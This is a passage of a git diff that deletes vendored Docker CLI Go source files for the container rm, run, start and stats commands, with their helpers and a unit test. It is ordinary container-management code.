-	var opts rmOptions
-
-	cmd := &cobra.Command{
-		Use:   "rm [OPTIONS] CONTAINER [CONTAINER...]",
-		Short: "Remove one or more containers",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.containers = args
-			return runRm(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.rmVolumes, "volumes", "v", false, "Remove the volumes associated with the container")
-	flags.BoolVarP(&opts.rmLink, "link", "l", false, "Remove the specified link")
-	flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of a running container (uses SIGKILL)")
-	return cmd
-}
-
-func runRm(dockerCli *command.DockerCli, opts *rmOptions) error {
-	ctx := context.Background()
-
-	var errs []string
-	options := types.ContainerRemoveOptions{
-		RemoveVolumes: opts.rmVolumes,
-		RemoveLinks:   opts.rmLink,
-		Force:         opts.force,
-	}
-
-	errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error {
-		if container == "" {
-			return fmt.Errorf("Container name cannot be empty")
-		}
-		container = strings.Trim(container, "/")
-		return dockerCli.Client().ContainerRemove(ctx, container, options)
-	})
-
-	for _, name := range opts.containers {
-		if err := <-errChan; err != nil {
-			errs = append(errs, err.Error())
-		} else {
-			fmt.Fprintf(dockerCli.Out(), "%s\n", name)
-		}
-	}
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/run.go b/vendor/github.com/docker/docker/cli/command/container/run.go
deleted file mode 100644
index 0fad93e688..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/run.go
+++ /dev/null
@@ -1,285 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"io"
-	"net/http/httputil"
-	"os"
-	"runtime"
-	"strings"
-	"syscall"
-
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	opttypes "github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/promise"
-	"github.com/docker/docker/pkg/signal"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/docker/libnetwork/resolvconf/dns"
-	"github.com/spf13/cobra"
-	"github.com/spf13/pflag"
-)
-
-type runOptions struct {
-	detach     bool
-	sigProxy   bool
-	name       string
-	detachKeys string
-}
-
-// NewRunCommand create a new `docker run` command
-func NewRunCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts runOptions
-	var copts *runconfigopts.ContainerOptions
-
-	cmd := &cobra.Command{
-		Use:   "run [OPTIONS] IMAGE [COMMAND] [ARG...]",
-		Short: "Run a command in a new container",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			copts.Image = args[0]
-			if len(args) > 1 {
-				copts.Args = args[1:]
-			}
-			return runRun(dockerCli, cmd.Flags(), &opts, copts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.SetInterspersed(false)
-
-	// These are flags not stored in Config/HostConfig
-	flags.BoolVarP(&opts.detach, "detach", "d", false, "Run container in background and print container ID")
-	flags.BoolVar(&opts.sigProxy, "sig-proxy", true, "Proxy received signals to the process")
-	flags.StringVar(&opts.name, "name", "", "Assign a name to the container")
-	flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container")
-
-	// Add an explicit help that doesn't have a `-h` to prevent the conflict
-	// with hostname
-	flags.Bool("help", false, "Print usage")
-
-	command.AddTrustedFlags(flags, true)
-	copts = runconfigopts.AddFlags(flags)
-	return cmd
-}
-
-func runRun(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *runOptions, copts *runconfigopts.ContainerOptions) error {
-	stdout, stderr, stdin := dockerCli.Out(), dockerCli.Err(), dockerCli.In()
-	client := dockerCli.Client()
-	// TODO: pass this as an argument
-	cmdPath := "run"
-
-	var (
-		flAttach                              *opttypes.ListOpts
-		ErrConflictAttachDetach               = fmt.Errorf("Conflicting options: -a and -d")
-		ErrConflictRestartPolicyAndAutoRemove = fmt.Errorf("Conflicting options: --restart and --rm")
-	)
-
-	config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts)
-
-	// just in case the Parse does not exit
-	if err != nil {
-		reportError(stderr, cmdPath, err.Error(), true)
-		return cli.StatusError{StatusCode: 125}
-	}
-
-	if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() {
-		return ErrConflictRestartPolicyAndAutoRemove
-	}
-	if hostConfig.OomKillDisable != nil && *hostConfig.OomKillDisable && hostConfig.Memory == 0 {
-		fmt.Fprintf(stderr, "WARNING: Disabling the OOM killer on containers without setting a '-m/--memory' limit may be dangerous.\n")
-	}
-
-	if len(hostConfig.DNS) > 0 {
-		// check the DNS settings passed via --dns against
-		// localhost regexp to warn if they are trying to
-		// set a DNS to a localhost address
-		for _, dnsIP := range hostConfig.DNS {
-			if dns.IsLocalhost(dnsIP) {
-				fmt.Fprintf(stderr, "WARNING: Localhost DNS setting (--dns=%s) may fail in containers.\n", dnsIP)
-				break
-			}
-		}
-	}
-
-	config.ArgsEscaped = false
-
-	if !opts.detach {
-		if err := dockerCli.In().CheckTty(config.AttachStdin, config.Tty); err != nil {
-			return err
-		}
-	} else {
-		if fl := flags.Lookup("attach"); fl != nil {
-			flAttach = fl.Value.(*opttypes.ListOpts)
-			if flAttach.Len() != 0 {
-				return ErrConflictAttachDetach
-			}
-		}
-
-		config.AttachStdin = false
-		config.AttachStdout = false
-		config.AttachStderr = false
-		config.StdinOnce = false
-	}
-
-	// Disable sigProxy when in TTY mode
-	if config.Tty {
-		opts.sigProxy = false
-	}
-
-	// Telling the Windows daemon the initial size of the tty during start makes
-	// a far better user experience rather than relying on subsequent resizes
-	// to cause things to catch up.
-	if runtime.GOOS == "windows" {
-		hostConfig.ConsoleSize[0], hostConfig.ConsoleSize[1] = dockerCli.Out().GetTtySize()
-	}
-
-	ctx, cancelFun := context.WithCancel(context.Background())
-
-	createResponse, err := createContainer(ctx, dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name)
-	if err != nil {
-		reportError(stderr, cmdPath, err.Error(), true)
-		return runStartContainerErr(err)
-	}
-	if opts.sigProxy {
-		sigc := ForwardAllSignals(ctx, dockerCli, createResponse.ID)
-		defer signal.StopCatch(sigc)
-	}
-	var (
-		waitDisplayID chan struct{}
-		errCh         chan error
-	)
-	if !config.AttachStdout && !config.AttachStderr {
-		// Make this asynchronous to allow the client to write to stdin before having to read the ID
-		waitDisplayID = make(chan struct{})
-		go func() {
-			defer close(waitDisplayID)
-			fmt.Fprintf(stdout, "%s\n", createResponse.ID)
-		}()
-	}
-	attach := config.AttachStdin || config.AttachStdout || config.AttachStderr
-	if attach {
-		var (
-			out, cerr io.Writer
-			in        io.ReadCloser
-		)
-		if config.AttachStdin {
-			in = stdin
-		}
-		if config.AttachStdout {
-			out = stdout
-		}
-		if config.AttachStderr {
-			if config.Tty {
-				cerr = stdout
-			} else {
-				cerr = stderr
-			}
-		}
-
-		if opts.detachKeys != "" {
-			dockerCli.ConfigFile().DetachKeys = opts.detachKeys
-		}
-
-		options := types.ContainerAttachOptions{
-			Stream:     true,
-			Stdin:      config.AttachStdin,
-			Stdout:     config.AttachStdout,
-			Stderr:     config.AttachStderr,
-			DetachKeys: dockerCli.ConfigFile().DetachKeys,
-		}
-
-		resp, errAttach := client.ContainerAttach(ctx, createResponse.ID, options)
-		if errAttach != nil && errAttach != httputil.ErrPersistEOF {
-			// ContainerAttach returns an ErrPersistEOF (connection closed)
-			// means server met an error and put it in Hijacked connection
-			// keep the error and read detailed error message from hijacked connection later
-			return errAttach
-		}
-		defer resp.Close()
-
-		errCh = promise.Go(func() error {
-			errHijack := holdHijackedConnection(ctx, dockerCli, config.Tty, in, out, cerr, resp)
-			if errHijack == nil {
-				return errAttach
-			}
-			return errHijack
-		})
-	}
-
-	statusChan := waitExitOrRemoved(ctx, dockerCli, createResponse.ID, hostConfig.AutoRemove)
-
-	//start the container
-	if err := client.ContainerStart(ctx, createResponse.ID, types.ContainerStartOptions{}); err != nil {
-		// If we have holdHijackedConnection, we should notify
-		// holdHijackedConnection we are going to exit and wait
-		// to avoid the terminal are not restored.
-		if attach {
-			cancelFun()
-			<-errCh
-		}
-
-		reportError(stderr, cmdPath, err.Error(), false)
-		if hostConfig.AutoRemove {
-			// wait container to be removed
-			<-statusChan
-		}
-		return runStartContainerErr(err)
-	}
-
-	if (config.AttachStdin || config.AttachStdout || config.AttachStderr) && config.Tty && dockerCli.Out().IsTerminal() {
-		if err := MonitorTtySize(ctx, dockerCli, createResponse.ID, false); err != nil {
-			fmt.Fprintf(stderr, "Error monitoring TTY size: %s\n", err)
-		}
-	}
-
-	if errCh != nil {
-		if err := <-errCh; err != nil {
-			logrus.Debugf("Error hijack: %s", err)
-			return err
-		}
-	}
-
-	// Detached mode: wait for the id to be displayed and return.
-	if !config.AttachStdout && !config.AttachStderr {
-		// Detached mode
-		<-waitDisplayID
-		return nil
-	}
-
-	status := <-statusChan
-	if status != 0 {
-		return cli.StatusError{StatusCode: status}
-	}
-	return nil
-}
-
-// reportError is a utility method that prints a user-friendly message
-// containing the error that occurred during parsing and a suggestion to get help
-func reportError(stderr io.Writer, name string, str string, withHelp bool) {
-	if withHelp {
-		str += ".\nSee '" + os.Args[0] + " " + name + " --help'"
-	}
-	fmt.Fprintf(stderr, "%s: %s.\n", os.Args[0], str)
-}
-
-// if container start fails with 'not found'/'no such' error, return 127
-// if container start fails with 'permission denied' error, return 126
-// return 125 for generic docker daemon failures
-func runStartContainerErr(err error) error {
-	trimmedErr := strings.TrimPrefix(err.Error(), "Error response from daemon: ")
-	statusError := cli.StatusError{StatusCode: 125}
-	if strings.Contains(trimmedErr, "executable file not found") ||
-		strings.Contains(trimmedErr, "no such file or directory") ||
-		strings.Contains(trimmedErr, "system cannot find the file specified") {
-		statusError = cli.StatusError{StatusCode: 127}
-	} else if strings.Contains(trimmedErr, syscall.EACCES.Error()) {
-		statusError = cli.StatusError{StatusCode: 126}
-	}
-
-	return statusError
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/start.go b/vendor/github.com/docker/docker/cli/command/container/start.go
deleted file mode 100644
index 3521a41949..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/start.go
+++ /dev/null
@@ -1,179 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"io"
-	"net/http/httputil"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/promise"
-	"github.com/docker/docker/pkg/signal"
-	"github.com/spf13/cobra"
-)
-
-type startOptions struct {
-	attach        bool
-	openStdin     bool
-	detachKeys    string
-	checkpoint    string
-	checkpointDir string
-
-	containers []string
-}
-
-// NewStartCommand creates a new cobra.Command for `docker start`
-func NewStartCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts startOptions
-
-	cmd := &cobra.Command{
-		Use:   "start [OPTIONS] CONTAINER [CONTAINER...]",
-		Short: "Start one or more stopped containers",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.containers = args
-			return runStart(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.attach, "attach", "a", false, "Attach STDOUT/STDERR and forward signals")
-	flags.BoolVarP(&opts.openStdin, "interactive", "i", false, "Attach container's STDIN")
-	flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container")
-
-	flags.StringVar(&opts.checkpoint, "checkpoint", "", "Restore from this checkpoint")
-	flags.SetAnnotation("checkpoint", "experimental", nil)
-	flags.StringVar(&opts.checkpointDir, "checkpoint-dir", "", "Use a custom checkpoint storage directory")
-	flags.SetAnnotation("checkpoint-dir", "experimental", nil)
-	return cmd
-}
-
-func runStart(dockerCli *command.DockerCli, opts *startOptions) error {
-	ctx, cancelFun := context.WithCancel(context.Background())
-
-	if opts.attach || opts.openStdin {
-		// We're going to attach to a container.
-		// 1. Ensure we only have one container.
-		if len(opts.containers) > 1 {
-			return fmt.Errorf("You cannot start and attach multiple containers at once.")
-		}
-
-		// 2. Attach to the container.
-		container := opts.containers[0]
-		c, err := dockerCli.Client().ContainerInspect(ctx, container)
-		if err != nil {
-			return err
-		}
-
-		// We always use c.ID instead of container to maintain consistency during `docker start`
-		if !c.Config.Tty {
-			sigc := ForwardAllSignals(ctx, dockerCli, c.ID)
-			defer signal.StopCatch(sigc)
-		}
-
-		if opts.detachKeys != "" {
-			dockerCli.ConfigFile().DetachKeys = opts.detachKeys
-		}
-
-		options := types.ContainerAttachOptions{
-			Stream:     true,
-			Stdin:      opts.openStdin && c.Config.OpenStdin,
-			Stdout:     true,
-			Stderr:     true,
-			DetachKeys: dockerCli.ConfigFile().DetachKeys,
-		}
-
-		var in io.ReadCloser
-
-		if options.Stdin {
-			in = dockerCli.In()
-		}
-
-		resp, errAttach := dockerCli.Client().ContainerAttach(ctx, c.ID, options)
-		if errAttach != nil && errAttach != httputil.ErrPersistEOF {
-			// ContainerAttach return an ErrPersistEOF (connection closed)
-			// means server met an error and already put it in Hijacked connection,
-			// we would keep the error and read the detailed error message from hijacked connection
-			return errAttach
-		}
-		defer resp.Close()
-		cErr := promise.Go(func() error {
-			errHijack := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp)
-			if errHijack == nil {
-				return errAttach
-			}
-			return errHijack
-		})
-
-		// 3. We should open a channel for receiving status code of the container
-		// no matter it's detached, removed on daemon side(--rm) or exit normally.
-		statusChan := waitExitOrRemoved(ctx, dockerCli, c.ID, c.HostConfig.AutoRemove)
-		startOptions := types.ContainerStartOptions{
-			CheckpointID:  opts.checkpoint,
-			CheckpointDir: opts.checkpointDir,
-		}
-
-		// 4. Start the container.
-		if err := dockerCli.Client().ContainerStart(ctx, c.ID, startOptions); err != nil {
-			cancelFun()
-			<-cErr
-			if c.HostConfig.AutoRemove {
-				// wait container to be removed
-				<-statusChan
-			}
-			return err
-		}
-
-		// 5. Wait for attachment to break.
-		if c.Config.Tty && dockerCli.Out().IsTerminal() {
-			if err := MonitorTtySize(ctx, dockerCli, c.ID, false); err != nil {
-				fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err)
-			}
-		}
-		if attchErr := <-cErr; attchErr != nil {
-			return attchErr
-		}
-
-		if status := <-statusChan; status != 0 {
-			return cli.StatusError{StatusCode: status}
-		}
-	} else if opts.checkpoint != "" {
-		if len(opts.containers) > 1 {
-			return fmt.Errorf("You cannot restore multiple containers at once.")
-		}
-		container := opts.containers[0]
-		startOptions := types.ContainerStartOptions{
-			CheckpointID:  opts.checkpoint,
-			CheckpointDir: opts.checkpointDir,
-		}
-		return dockerCli.Client().ContainerStart(ctx, container, startOptions)
-
-	} else {
-		// We're not going to attach to anything.
-		// Start as many containers as we want.
-		return startContainersWithoutAttachments(ctx, dockerCli, opts.containers)
-	}
-
-	return nil
-}
-
-func startContainersWithoutAttachments(ctx context.Context, dockerCli *command.DockerCli, containers []string) error {
-	var failedContainers []string
-	for _, container := range containers {
-		if err := dockerCli.Client().ContainerStart(ctx, container, types.ContainerStartOptions{}); err != nil {
-			fmt.Fprintf(dockerCli.Err(), "%s\n", err)
-			failedContainers = append(failedContainers, container)
-		} else {
-			fmt.Fprintf(dockerCli.Out(), "%s\n", container)
-		}
-	}
-
-	if len(failedContainers) > 0 {
-		return fmt.Errorf("Error: failed to start containers: %v", strings.Join(failedContainers, ", "))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/stats.go b/vendor/github.com/docker/docker/cli/command/container/stats.go
deleted file mode 100644
index 12d5c68522..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/stats.go
+++ /dev/null
@@ -1,243 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"io"
-	"strings"
-	"sync"
-	"time"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/events"
-	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/formatter"
-	"github.com/spf13/cobra"
-)
-
-type statsOptions struct {
-	all        bool
-	noStream   bool
-	format     string
-	containers []string
-}
-
-// NewStatsCommand creates a new cobra.Command for `docker stats`
-func NewStatsCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts statsOptions
-
-	cmd := &cobra.Command{
-		Use:   "stats [OPTIONS] [CONTAINER...]",
-		Short: "Display a live stream of container(s) resource usage statistics",
-		Args:  cli.RequiresMinArgs(0),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.containers = args
-			return runStats(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)")
-	flags.BoolVar(&opts.noStream, "no-stream", false, "Disable streaming stats and only pull the first result")
-	flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template")
-	return cmd
-}
-
-// runStats displays a live stream of resource usage statistics for one or more containers.
-// This shows real-time information on CPU usage, memory usage, and network I/O.
-func runStats(dockerCli *command.DockerCli, opts *statsOptions) error {
-	showAll := len(opts.containers) == 0
-	closeChan := make(chan error)
-
-	ctx := context.Background()
-
-	// monitorContainerEvents watches for container creation and removal (only
-	// used when calling `docker stats` without arguments).
-	monitorContainerEvents := func(started chan<- struct{}, c chan events.Message) {
-		f := filters.NewArgs()
-		f.Add("type", "container")
-		options := types.EventsOptions{
-			Filters: f,
-		}
-
-		eventq, errq := dockerCli.Client().Events(ctx, options)
-
-		// Whether we successfully subscribed to eventq or not, we can now
-		// unblock the main goroutine.
-		close(started)
-
-		for {
-			select {
-			case event := <-eventq:
-				c <- event
-			case err := <-errq:
-				closeChan <- err
-				return
-			}
-		}
-	}
-
-	// Get the daemonOSType if not set already
-	if daemonOSType == "" {
-		svctx := context.Background()
-		sv, err := dockerCli.Client().ServerVersion(svctx)
-		if err != nil {
-			return err
-		}
-		daemonOSType = sv.Os
-	}
-
-	// waitFirst is a WaitGroup to wait first stat data's reach for each container
-	waitFirst := &sync.WaitGroup{}
-
-	cStats := stats{}
-	// getContainerList simulates creation event for all previously existing
-	// containers (only used when calling `docker stats` without arguments).
-	getContainerList := func() {
-		options := types.ContainerListOptions{
-			All: opts.all,
-		}
-		cs, err := dockerCli.Client().ContainerList(ctx, options)
-		if err != nil {
-			closeChan <- err
-		}
-		for _, container := range cs {
-			s := formatter.NewContainerStats(container.ID[:12], daemonOSType)
-			if cStats.add(s) {
-				waitFirst.Add(1)
-				go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst)
-			}
-		}
-	}
-
-	if showAll {
-		// If no names were specified, start a long running goroutine which
-		// monitors container events. We make sure we're subscribed before
-		// retrieving the list of running containers to avoid a race where we
-		// would "miss" a creation.
-		started := make(chan struct{})
-		eh := command.InitEventHandler()
-		eh.Handle("create", func(e events.Message) {
-			if opts.all {
-				s := formatter.NewContainerStats(e.ID[:12], daemonOSType)
-				if cStats.add(s) {
-					waitFirst.Add(1)
-					go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst)
-				}
-			}
-		})
-
-		eh.Handle("start", func(e events.Message) {
-			s := formatter.NewContainerStats(e.ID[:12], daemonOSType)
-			if cStats.add(s) {
-				waitFirst.Add(1)
-				go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst)
-			}
-		})
-
-		eh.Handle("die", func(e events.Message) {
-			if !opts.all {
-				cStats.remove(e.ID[:12])
-			}
-		})
-
-		eventChan := make(chan events.Message)
-		go eh.Watch(eventChan)
-		go monitorContainerEvents(started, eventChan)
-		defer close(eventChan)
-		<-started
-
-		// Start a short-lived goroutine to retrieve the initial list of
-		// containers.
-		getContainerList()
-	} else {
-		// Artificially send creation events for the containers we were asked to
-		// monitor (same code path than we use when monitoring all containers).
-		for _, name := range opts.containers {
-			s := formatter.NewContainerStats(name, daemonOSType)
-			if cStats.add(s) {
-				waitFirst.Add(1)
-				go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst)
-			}
-		}
-
-		// We don't expect any asynchronous errors: closeChan can be closed.
-		close(closeChan)
-
-		// Do a quick pause to detect any error with the provided list of
-		// container names.
-		time.Sleep(1500 * time.Millisecond)
-		var errs []string
-		cStats.mu.Lock()
-		for _, c := range cStats.cs {
-			cErr := c.GetError()
-			if cErr != nil {
-				errs = append(errs, fmt.Sprintf("%s: %v", c.Name, cErr))
-			}
-		}
-		cStats.mu.Unlock()
-		if len(errs) > 0 {
-			return fmt.Errorf("%s", strings.Join(errs, ", "))
-		}
-	}
-
-	// before print to screen, make sure each container get at least one valid stat data
-	waitFirst.Wait()
-	format := opts.format
-	if len(format) == 0 {
-		if len(dockerCli.ConfigFile().StatsFormat) > 0 {
-			format = dockerCli.ConfigFile().StatsFormat
-		} else {
-			format = formatter.TableFormatKey
-		}
-	}
-	statsCtx := formatter.Context{
-		Output: dockerCli.Out(),
-		Format: formatter.NewStatsFormat(format, daemonOSType),
-	}
-	cleanScreen := func() {
-		if !opts.noStream {
-			fmt.Fprint(dockerCli.Out(), "\033[2J")
-			fmt.Fprint(dockerCli.Out(), "\033[H")
-		}
-	}
-
-	var err error
-	for range time.Tick(500 * time.Millisecond) {
-		cleanScreen()
-		ccstats := []formatter.StatsEntry{}
-		cStats.mu.Lock()
-		for _, c := range cStats.cs {
-			ccstats = append(ccstats, c.GetStatistics())
-		}
-		cStats.mu.Unlock()
-		if err = formatter.ContainerStatsWrite(statsCtx, ccstats); err != nil {
-			break
-		}
-		if len(cStats.cs) == 0 && !showAll {
-			break
-		}
-		if opts.noStream {
-			break
-		}
-		select {
-		case err, ok := <-closeChan:
-			if ok {
-				if err != nil {
-					// this is suppressing "unexpected EOF" in the cli when the
-					// daemon restarts so it shutdowns cleanly
-					if err == io.ErrUnexpectedEOF {
-						return nil
-					}
-					return err
-				}
-			}
-		default:
-			// just skip
-		}
-	}
-	return err
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go b/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go
deleted file mode 100644
index 4b57e3fe05..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go
+++ /dev/null
@@ -1,226 +0,0 @@
-package container
-
-import (
-	"encoding/json"
-	"errors"
-	"io"
-	"strings"
-	"sync"
-	"time"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli/command/formatter"
-	"github.com/docker/docker/client"
-	"golang.org/x/net/context"
-)
-
-type stats struct {
-	ostype string
-	mu     sync.Mutex
-	cs     []*formatter.ContainerStats
-}
-
-// daemonOSType is set once we have at least one stat for a container
-// from the daemon. It is used to ensure we print the right header based
-// on the daemon platform.
-var daemonOSType string
-
-func (s *stats) add(cs *formatter.ContainerStats) bool {
-	s.mu.Lock()
-	defer s.mu.Unlock()
-	if _, exists := s.isKnownContainer(cs.Container); !exists {
-		s.cs = append(s.cs, cs)
-		return true
-	}
-	return false
-}
-
-func (s *stats) remove(id string) {
-	s.mu.Lock()
-	if i, exists := s.isKnownContainer(id); exists {
-		s.cs = append(s.cs[:i], s.cs[i+1:]...)
-	}
-	s.mu.Unlock()
-}
-
-func (s *stats) isKnownContainer(cid string) (int, bool) {
-	for i, c := range s.cs {
-		if c.Container == cid {
-			return i, true
-		}
-	}
-	return -1, false
-}
-
-func collect(ctx context.Context, s *formatter.ContainerStats, cli client.APIClient, streamStats bool, waitFirst *sync.WaitGroup) {
-	logrus.Debugf("collecting stats for %s", s.Container)
-	var (
-		getFirst       bool
-		previousCPU    uint64
-		previousSystem uint64
-		u              = make(chan error, 1)
-	)
-
-	defer func() {
-		// if error happens and we get nothing of stats, release wait group whatever
-		if !getFirst {
-			getFirst = true
-			waitFirst.Done()
-		}
-	}()
-
-	response, err := cli.ContainerStats(ctx, s.Container, streamStats)
-	if err != nil {
-		s.SetError(err)
-		return
-	}
-	defer response.Body.Close()
-
-	dec := json.NewDecoder(response.Body)
-	go func() {
-		for {
-			var (
-				v                 *types.StatsJSON
-				memPercent        = 0.0
-				cpuPercent        = 0.0
-				blkRead, blkWrite uint64 // Only used on Linux
-				mem               = 0.0
-				memLimit          = 0.0
-				memPerc           = 0.0
-				pidsStatsCurrent  uint64
-			)
-
-			if err := dec.Decode(&v); err != nil {
-				dec = json.NewDecoder(io.MultiReader(dec.Buffered(), response.Body))
-				u <- err
-				if err == io.EOF {
-					break
-				}
-				time.Sleep(100 * time.Millisecond)
-				continue
-			}
-
-			daemonOSType = response.OSType
-
-			if daemonOSType != "windows" {
-				// MemoryStats.Limit will never be 0 unless the container is not running and we haven't
-				// got any data from cgroup
-				if v.MemoryStats.Limit != 0 {
-					memPercent = float64(v.MemoryStats.Usage) / float64(v.MemoryStats.Limit) * 100.0
-				}
-				previousCPU = v.PreCPUStats.CPUUsage.TotalUsage
-				previousSystem = v.PreCPUStats.SystemUsage
-				cpuPercent = calculateCPUPercentUnix(previousCPU, previousSystem, v)
-				blkRead, blkWrite = calculateBlockIO(v.BlkioStats)
-				mem = float64(v.MemoryStats.Usage)
-				memLimit = float64(v.MemoryStats.Limit)
-				memPerc = memPercent
-				pidsStatsCurrent = v.PidsStats.Current
-			} else {
-				cpuPercent = calculateCPUPercentWindows(v)
-				blkRead = v.StorageStats.ReadSizeBytes
-				blkWrite = v.StorageStats.WriteSizeBytes
-				mem = float64(v.MemoryStats.PrivateWorkingSet)
-			}
-			netRx, netTx := calculateNetwork(v.Networks)
-			s.SetStatistics(formatter.StatsEntry{
-				Name:             v.Name,
-				ID:               v.ID,
-				CPUPercentage:    cpuPercent,
-				Memory:           mem,
-				MemoryPercentage: memPerc,
-				MemoryLimit:      memLimit,
-				NetworkRx:        netRx,
-				NetworkTx:        netTx,
-				BlockRead:        float64(blkRead),
-				BlockWrite:       float64(blkWrite),
-				PidsCurrent:      pidsStatsCurrent,
-			})
-			u <- nil
-			if !streamStats {
-				return
-			}
-		}
-	}()
-	for {
-		select {
-		case <-time.After(2 * time.Second):
-			// zero out the values if we have not received an update within
-			// the specified duration.
-			s.SetErrorAndReset(errors.New("timeout waiting for stats"))
-			// if this is the first stat you get, release WaitGroup
-			if !getFirst {
-				getFirst = true
-				waitFirst.Done()
-			}
-		case err := <-u:
-			if err != nil {
-				s.SetError(err)
-				continue
-			}
-			s.SetError(nil)
-			// if this is the first stat you get, release WaitGroup
-			if !getFirst {
-				getFirst = true
-				waitFirst.Done()
-			}
-		}
-		if !streamStats {
-			return
-		}
-	}
-}
-
-func calculateCPUPercentUnix(previousCPU, previousSystem uint64, v *types.StatsJSON) float64 {
-	var (
-		cpuPercent = 0.0
-		// calculate the change for the cpu usage of the container in between readings
-		cpuDelta = float64(v.CPUStats.CPUUsage.TotalUsage) - float64(previousCPU)
-		// calculate the change for the entire system between readings
-		systemDelta = float64(v.CPUStats.SystemUsage) - float64(previousSystem)
-	)
-
-	if systemDelta > 0.0 && cpuDelta > 0.0 {
-		cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0
-	}
-	return cpuPercent
-}
-
-func calculateCPUPercentWindows(v *types.StatsJSON) float64 {
-	// Max number of 100ns intervals between the previous time read and now
-	possIntervals := uint64(v.Read.Sub(v.PreRead).Nanoseconds()) // Start with number of ns intervals
-	possIntervals /= 100                                         // Convert to number of 100ns intervals
-	possIntervals *= uint64(v.NumProcs)                          // Multiple by the number of processors
-
-	// Intervals used
-	intervalsUsed := v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage
-
-	// Percentage avoiding divide-by-zero
-	if possIntervals > 0 {
-		return float64(intervalsUsed) / float64(possIntervals) * 100.0
-	}
-	return 0.00
-}
-
-func calculateBlockIO(blkio types.BlkioStats) (blkRead uint64, blkWrite uint64) {
-	for _, bioEntry := range blkio.IoServiceBytesRecursive {
-		switch strings.ToLower(bioEntry.Op) {
-		case "read":
-			blkRead = blkRead + bioEntry.Value
-		case "write":
-			blkWrite = blkWrite + bioEntry.Value
-		}
-	}
-	return
-}
-
-func calculateNetwork(network map[string]types.NetworkStats) (float64, float64) {
-	var rx, tx float64
-
-	for _, v := range network {
-		rx += float64(v.RxBytes)
-		tx += float64(v.TxBytes)
-	}
-	return rx, tx
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go b/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go
deleted file mode 100644
index 828d634c8a..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package container
-
-import (
-	"testing"
-
-	"github.com/docker/docker/api/types"
-)
-
-func TestCalculateBlockIO(t *testing.T) {
-	blkio := types.BlkioStats{
-		IoServiceBytesRecursive: []types.BlkioStatEntry{{8, 0, "read", 1234}, {8, 1, "read", 4567}, {8, 0, "write", 123}, {8, 1, "write", 456}},
-	}
-	blkRead, blkWrite := calculateBlockIO(blkio)
-	if blkRead != 5801 {
-		t.Fatalf("blkRead = %d, want 5801", blkRead)
-	}
-	if blkWrite != 579 {
-		t.Fatalf("blkWrite = %d, want 579", blkWrite)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/stop.go b/vendor/github.com/docker/docker/cli/command/container/stop.go
deleted file mode 100644
index c68ede5368..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/stop.go
